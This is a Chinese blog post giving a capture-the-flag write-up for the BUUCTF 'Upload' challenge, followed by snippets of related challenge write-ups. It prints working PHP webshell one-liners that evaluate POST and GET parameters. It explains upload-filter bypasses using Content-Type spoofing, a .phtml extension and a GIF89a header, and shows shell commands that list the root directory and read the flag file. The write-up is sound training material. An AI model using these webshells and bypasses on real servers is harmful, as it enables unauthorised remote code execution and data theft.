首页 > 其他分享 >[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

时间:2024-11-12 21:40:29浏览次数:1  
标签:aa phtml 极客 get Upload 后缀名 flag 2019 GIF89a


直接上传shell.php,发现提示不是图片,这时先修改后缀名或者Content-Type数。我们使用burp suite进行操作

抓包后发送到repeater,直接修改后缀名不行,看来是通过Content-Type属性来判断是否为图片的,将Content-Type修改为image/jpeg,回显not! php!

将文件后缀名修改为phtml,回显包含了<?符号

我们换成phtml形式的script脚本;例如:

GIF89a #绕过PHP getimagesize的检查
<script language='php'>@eval($_POST['aa']);</script>


使用蚁剑连接,http://e2b65d03-705e-4f14-ac0f-e35ab1cdd086.node5.buuoj.cn:81/upload/phtml_shell.phtml,密码aa

打开即可得到flag

也可以使用get类型的shell

  GIF89a
  <script language='php'>@eval($_GET['aa']);</script>

访问文件,使用system命令查看/upload/phtml_get.phtml?aa=system("ls /");,得到

GIF89a bin boot data dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

使用cat命令查看flag文件/upload/phtml_get.phtml?aa=system("cat /flag");得到GIF89a flag{551ada2c-4534-41e3-a7fe-a47ba81ea487}

标签:aa,phtml,极客,get,Upload,后缀名,flag,2019,GIF89a
From: https://www.cnblogs.com/abenben/p/18542713

相关文章

  • [极客大挑战 2019]Http
    打开页面如下:主页没有什么信息,直接查看网页源代码,查找href看看有没有链接,发现Secret.php访问得到,Itdoesn'tcomefrom'https://Sycsecret.buuoj.cn',我们知道这需要修改referer。使用burpsuite抓包抓包后,转发到repeater,添加referer属性,send访问,发现要求使用'Syclover'浏览......
  • P8680 [蓝桥杯 2019 省 B] 特别数的和 java
    题目描述小明对数位中含有 22、00、11、99 的数字很感兴趣(不包括前导 00),在 11 到 4040 中这样的数包括 11、22、99、1010 至 3232、3939 和 4040,共 2828 个,他们的和是 574574。请问,在 11 到 nn 中,所有这样的数的和是多少?输入格式输入一行包含一个整数 ......
  • [buuctf]/[极客大挑战 2019]BabySQL 1
    页面上提示输入会被严格过滤,这里我们就要留意一下,经常被过滤掉的几个词首先测试闭合方式。http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1'&password=1这里单引号出现报错,猜测闭合方式是单引号。下一步,进步确认闭合方式,正常步骤应......
  • flink Uploaded Jars 路径 flink提交jar包
    flinkUploadedJars路径flink提交jar包漏洞描述:2019年11月11号,安全工程师HenryChen披露了一个ApacheFlink未授权上传jar包导致远程代码执行的漏洞。由于ApacheFlinkDashboard默认无需认证即可访问,通过上传恶意jar包并触发恶意代码执行,从而获取shell。影响范围<=1......
  • ciscn_2019_n_1
    题目链接:ciscn_2019_n_1。下载附件后,使用IDA打开程序,并进行反编译,定位到main函数,如下。int__fastcallmain(intargc,constchar**argv,constchar**envp){setvbuf(_bss_start,0LL,2,0LL);setvbuf(stdin,0LL,2,0LL);func();return0;}func函数......
  • [极客大挑战 2019]Secret
    首页什么都没有,查看网页源码,发现有一个链接,提示found除去view-source访问,得到以下页面,点击secret直接查阅结束,没回显flag,依旧在卖关子。使用burpsuite抓包获取返回的源码,找到注释中有个文件secr3t.php访问secr3t.php得到代码里说flag在flag.php里,直接访问flag.php,发现......
  • [极客大挑战 2019]LoveSQL
    打开是一个登录界面使用admin'or1#万能密码绕过密码登录再使用admin'orderby3#找回显的列数,结果为3,再使用a'unionselect1,2,3#找回显的列,结果为2,3后面就是常规的union注入流程#找数据库和表名a'unionselect1,database(),group_concat(table_name)frominfor......
  • [强网杯 2019]随便注
    输入1',发现报错,且闭合符号为单引号那么我们可以尝试报错注入,先用orderby确认回显列数。这里回显列数为2用union确认回显位置,1unionselect1,2,发现这些字符被过滤了,尝试了大小写也不行,直接猜吧。这里可以用报错注入,1'and(extractvalue(1,concat(0x7e,database(),0x7e)))......
  • [GXYCTF2019]Ping Ping Ping
    打开页面如下:按提示输入ip127.0.0.1尝试加管道符,查看目录结构,?ip=127.0.0.1|lscat查看flag.php他骂我们,说空格不行。使用其他字符替换空格,?ip=127.0.0.1|cat$IFS$9flag.php又骂我们,说flag字符串不行,我们先看看index.php,直接审计代码看看怎么绕过,?ip=127.0.0.1|cat$IFS$......
  • [SUCTF 2019]EasySQL
    当输入数字时返回array结构,且任意非0数字都是返回1。当输入字符串时无任何回显。那么我们可以猜测sql语句中存在逻辑或符号||,因为任意非0在mysql中相当于true且返回值为1,而字符及字符串会被当作变量处理,或运算时会报错。那么绕过的方法是将mysql的sql_mode参数设置为PIPES_AS_CO......